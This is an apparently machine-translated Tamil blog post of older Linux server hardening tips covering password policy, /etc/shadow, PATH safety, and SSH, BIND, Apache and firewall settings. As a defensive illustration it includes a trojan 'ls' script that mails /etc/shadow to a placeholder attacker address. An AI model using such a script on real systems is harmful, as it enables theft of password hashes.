நான் நீண்ட காலமாக எதையும் வலைப்பதிவில் வெளியிடவில்லை, ஒரு புத்தகத்திலிருந்து எடுக்கப்பட்ட சில உதவிக்குறிப்புகளை உங்களுடன் பகிர்ந்து கொள்ள விரும்புகிறேன், (மற்றவற்றுடன்). நான் அதை பல்கலைக்கழகத்தில் கண்டுபிடித்தேன், நான் இப்போது படித்தேன், அது நேர்மையாக சற்று காலாவதியானது மற்றும் காட்டப்பட்ட நுட்பங்கள் அமைப்பின் பரிணாம வளர்ச்சியைக் கருத்தில் கொண்டு செயல்பட வாய்ப்பில்லை என்றாலும், அவை காண்பிக்கப்படக்கூடிய சுவாரஸ்யமான அம்சங்களும் ஆகும்.
டெஸ்க்டாப் பயனர் மட்டத்தில், அவை பயன்படுத்தப்படலாம் என்றாலும், அவை மிகவும் பயனுள்ளதாக இருக்காது என்பதால், அவை ஒரு நடுத்தர அல்லது பெரிய அளவில் ஒரு சேவையகமாகப் பயன்படுத்தப்படும் ஒரு லினக்ஸ் கணினியை அடிப்படையாகக் கொண்டவை என்பதை நான் தெளிவுபடுத்த விரும்புகிறேன்.
அவை எளிமையான விரைவான உதவிக்குறிப்புகள் என்பதையும் நான் கவனிக்கிறேன், மேலும் நான் விரிவாகப் போவதில்லை, இருப்பினும் ஒரு குறிப்பிட்ட தலைப்பில் மற்றொரு குறிப்பிட்ட மற்றும் விரிவான இடுகையைச் செய்ய நான் திட்டமிட்டுள்ளேன். ஆனால் நான் அதை பின்னர் பார்ப்பேன். தொடங்குவோம்.
கடவுச்சொல் கொள்கைகள்.
இது ஒரு கேட்ச்ஃபிரேஸாகத் தெரிந்தாலும், ஒரு நல்ல கடவுச்சொல் கொள்கையைக் கொண்டிருப்பது பாதிக்கப்படக்கூடிய அமைப்புக்கு இடையிலான வித்தியாசத்தை ஏற்படுத்துகிறது. "ப்ரூட் ஃபோர்ஸ்" போன்ற தாக்குதல்கள் ஒரு கணினியை அணுக மோசமான கடவுச்சொல்லை வைத்திருப்பதைப் பயன்படுத்துகின்றன. மிகவும் பொதுவான உதவிக்குறிப்புகள்:
- பெரிய எழுத்து மற்றும் சிறிய எழுத்துக்களை இணைக்கவும்.
- சிறப்பு எழுத்துக்களைப் பயன்படுத்தவும்.
- எண்கள்.
- 6 இலக்கங்களுக்கு மேல் (வட்டம் 8 க்கு மேல்).
இது தவிர, இரண்டு அத்தியாவசிய கோப்புகளை கருத்தில் கொள்வோம். / etc / passwd மற்றும் / etc / shadow.
மிக முக்கியமான ஒன்று கோப்பு / etc / passwd. பயனரின் பெயரை எங்களுக்கு வழங்குவதோடு, அவரது யுஐடி, கோப்புறை பாதை, பாஷ் .. போன்றவை. சில சந்தர்ப்பங்களில் இது பயனரின் மறைகுறியாக்கப்பட்ட விசையையும் காட்டுகிறது.
அதன் வழக்கமான அமைப்பைப் பார்ப்போம்.
desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash
பயனர்: cryptkey: uid: gid: path :: path: bash
இங்கே உண்மையான சிக்கல் என்னவென்றால், இந்த குறிப்பிட்ட கோப்பில் அனுமதிகள் உள்ளன -rw-r - r– அதாவது கணினியின் எந்தவொரு பயனருக்கும் இது வாசிப்பு அனுமதிகளைக் கொண்டுள்ளது. மறைகுறியாக்கப்பட்ட விசையை வைத்திருப்பது உண்மையான ஒன்றைப் புரிந்துகொள்வது மிகவும் கடினம் அல்ல.
அதனால்தான் கோப்பு உள்ளது / etc / shadow. எல்லா பயனர் விசைகளும் சேமிக்கப்படும் கோப்பு இது. இந்த கோப்பில் தேவையான அனுமதிகள் உள்ளன, இதனால் எந்த பயனரும் அதைப் படிக்க முடியாது.
இதை சரிசெய்ய, நாம் கோப்புக்கு செல்ல வேண்டும் / Etc / passwd மறைகுறியாக்கப்பட்ட விசையை "x" ஆக மாற்றினால், இது விசையை எங்கள் கோப்பில் மட்டுமே சேமிக்கும் / etc / shadow.
desdelinux:x:500:501::/home/usuario1:/bin/bash
PATH மற்றும் .bashrc மற்றும் பிறவற்றில் சிக்கல்கள்.
ஒரு பயனர் தங்கள் கன்சோலில் ஒரு கட்டளையை இயக்கும்போது, ஷெல் அந்த கட்டளையை PATH சூழல் மாறியில் உள்ள ஒரு அடைவு பட்டியலில் தேடுகிறது.
நீங்கள் கன்சோலில் "எதிரொலி $ PATH" என்று தட்டச்சு செய்தால், இது போன்ற ஒன்றை வெளியிடும்.
.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin
அந்த கோப்புறைகள் ஒவ்வொன்றும் ஷெல் அதை இயக்க எழுதப்பட்ட கட்டளையைத் தேடும். அவர் "." தேடலுக்கான முதல் கோப்புறை கட்டளை செயல்படுத்தப்படும் அதே கோப்புறையாகும்.
"கார்லோஸ்" என்ற பயனர் இருக்கிறார் என்றும் இந்த பயனர் "தீமை செய்ய" விரும்புகிறார் என்றும் வைத்துக்கொள்வோம். இந்த பயனர் தனது முக்கிய கோப்புறையில் "ls" என்று அழைக்கப்படும் ஒரு கோப்பை விடலாம், மேலும் இந்த கோப்பில் இது போன்ற ஒரு கட்டளையை இயக்கவும்:
#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls
இலக்கு விஷயங்களுக்கான ரூட் பயனர், கார்லோஸ் கோப்புறையில் உள்ள கோப்புறைகளை பட்டியலிட முயற்சித்தால் (அது முதலில் அதே கோப்புறையில் கட்டளையைத் தேடுவதால், கவனக்குறைவாக இது கடவுச்சொற்களைக் கொண்ட கோப்பை இந்த மின்னஞ்சலுக்கும் பின்னர் கோப்புறைகளுக்கும் அனுப்பும் பட்டியலிடப்படும் மற்றும் அவர் மிகவும் தாமதமாக கண்டுபிடிக்க முடியாது.
இதைத் தவிர்க்க நாம் "." PATH மாறியின்.
அதே வழியில், /.bashrc, /.bashrc_profile, ./.login போன்ற கோப்புகளை தணிக்கை செய்து "இல்லை" என்று சரிபார்க்க வேண்டும். PATH மாறியில், உண்மையில் இது போன்ற கோப்புகளிலிருந்து, நீங்கள் ஒரு குறிப்பிட்ட கட்டளையின் இலக்கை மாற்றலாம்.
சேவைகளுக்கான உதவிக்குறிப்புகள்:
எஸ்.எச்.எச்
- Sshd_config கோப்பில் ssh நெறிமுறையின் பதிப்பு 1 ஐ முடக்கு.
- ரூட் பயனரை ssh மூலம் உள்நுழைய அனுமதிக்காதீர்கள்.
- கோப்புகள் மற்றும் கோப்புறைகள் ssh_host_key, ssh_host_dsa_key மற்றும் ssh_host_rsa_key ஆகியவை ரூட் பயனரால் மட்டுமே படிக்கப்பட வேண்டும்.
BIND
- பெயரிடப்பட்ட கான்ஃப் கோப்பில் வரவேற்பு செய்தியை மாற்றவும், அது பதிப்பு எண்ணைக் காட்டாது
- மண்டல இடமாற்றங்களைக் கட்டுப்படுத்துங்கள், மேலும் தேவைப்படும் அணிகளுக்கு மட்டுமே இதை இயக்கவும்.
அப்பாச்சி
- வரவேற்பு செய்தியில் உங்கள் பதிப்பைக் காண்பிப்பதைத் தடுக்கவும். Httpd.conf கோப்பைத் திருத்தி வரிகளைச் சேர்க்கவும் அல்லது மாற்றவும்:
ServerSignature Off
ServerTokens Prod
- தானியங்கி அட்டவணையை முடக்கு
- .Htacces, * .inc, * .jsp .. போன்ற முக்கியமான கோப்புகளை வழங்க வேண்டாம் என்று அப்பாச்சியை உள்ளமைக்கவும்
- சேவையிலிருந்து மேன் பக்கங்கள் அல்லது மாதிரியை அகற்று
- ஒரு குரூட் சூழலில் அப்பாச்சியை இயக்கவும்
பிணைய பாதுகாப்பு.
வெளிப்புற நெட்வொர்க்கிலிருந்து உங்கள் கணினியில் சாத்தியமான அனைத்து உள்ளீடுகளையும் உள்ளடக்குவது அவசியம், ஊடுருவும் நபர்கள் உங்கள் நெட்வொர்க்கிலிருந்து ஸ்கேன் செய்து தகவல்களைப் பெறுவதைத் தடுக்க சில அத்தியாவசிய குறிப்புகள் இங்கே.
ICMP போக்குவரத்தைத் தடு
உள்வரும் மற்றும் வெளிச்செல்லும் அனைத்து ஐசிஎம்பி போக்குவரத்து மற்றும் எதிரொலி பதில்களைத் தடுக்க ஃபயர்வால் கட்டமைக்கப்பட வேண்டும். இதன் மூலம் நீங்கள் அதைத் தவிர்க்கிறீர்கள், எடுத்துக்காட்டாக, ஐபி வரம்பில் நேரடி உபகரணங்களைத் தேடும் ஸ்கேனர் உங்களைக் கண்டுபிடிக்கும்.
டி.சி.பி பிங் ஸ்கேன் தவிர்க்கவும்.
உங்கள் கணினியை ஸ்கேன் செய்வதற்கான ஒரு வழி TCP பிங் ஸ்கேன் ஆகும். உங்கள் சேவையகத்தில் போர்ட் 80 இல் ஒரு அப்பாச்சி சேவையகம் உள்ளது என்று வைத்துக்கொள்வோம். ஊடுருவும் நபர் அந்த துறைமுகத்திற்கு ஒரு ACK கோரிக்கையை அனுப்பலாம்.இதன் மூலம், கணினி பதிலளித்தால், கணினி உயிருடன் இருக்கும், மீதமுள்ள துறைமுகங்களை ஸ்கேன் செய்யும்.
இதற்காக, உங்கள் ஃபயர்வாலில் எப்போதும் "மாநில விழிப்புணர்வு" என்ற விருப்பம் இருக்க வேண்டும் மற்றும் ஏற்கனவே நிறுவப்பட்ட TCP இணைப்பு அல்லது அமர்வுக்கு பொருந்தாத அனைத்து ACK பாக்கெட்டுகளையும் நிராகரிக்க வேண்டும்.
சில கூடுதல் உதவிக்குறிப்புகள்:
- உங்கள் நெட்வொர்க்கில் போர்ட் ஸ்கேன்களைக் கண்டறிய ஐடிஎஸ் அமைப்புகளைப் பயன்படுத்தவும்.
- இணைப்பு மூல போர்ட் அமைப்புகளை நம்பாதபடி ஃபயர்வாலை உள்ளமைக்கவும்.
ஏனென்றால், சில ஸ்கேன்கள் 20 அல்லது 53 போன்ற "போலி" மூல போர்ட்டைப் பயன்படுத்துகின்றன, ஏனெனில் பல அமைப்புகள் இந்த துறைமுகங்களை நம்புகின்றன, ஏனெனில் அவை ஒரு ftp அல்லது DNS க்கு பொதுவானவை.
குறிப்பு: இந்த இடுகையில் சுட்டிக்காட்டப்பட்டுள்ள பெரும்பாலான சிக்கல்கள் ஏற்கனவே எல்லா தற்போதைய விநியோகங்களிலும் தீர்க்கப்பட்டுள்ளன என்பதை நினைவில் கொள்க. ஆனால் இந்த அச on கரியங்களைப் பற்றிய முக்கிய தகவல்களை வைத்திருப்பது ஒருபோதும் உங்களுக்கு வலிக்காது.
குறிப்பு: பின்னர் நான் ஒரு குறிப்பிட்ட தலைப்பைக் காண்பேன், மேலும் விரிவான மற்றும் தற்போதைய தகவல்களுடன் ஒரு இடுகையை உருவாக்குவேன்.
அனைவருக்கும் படிக்க நன்றி.
வாழ்த்துக்கள்.
நான் கட்டுரையை மிகவும் விரும்பினேன், இந்த விஷயத்தில் நான் ஆர்வமாக உள்ளேன், உள்ளடக்கத்தை தொடர்ந்து பதிவேற்ற ஊக்குவிக்கிறேன்.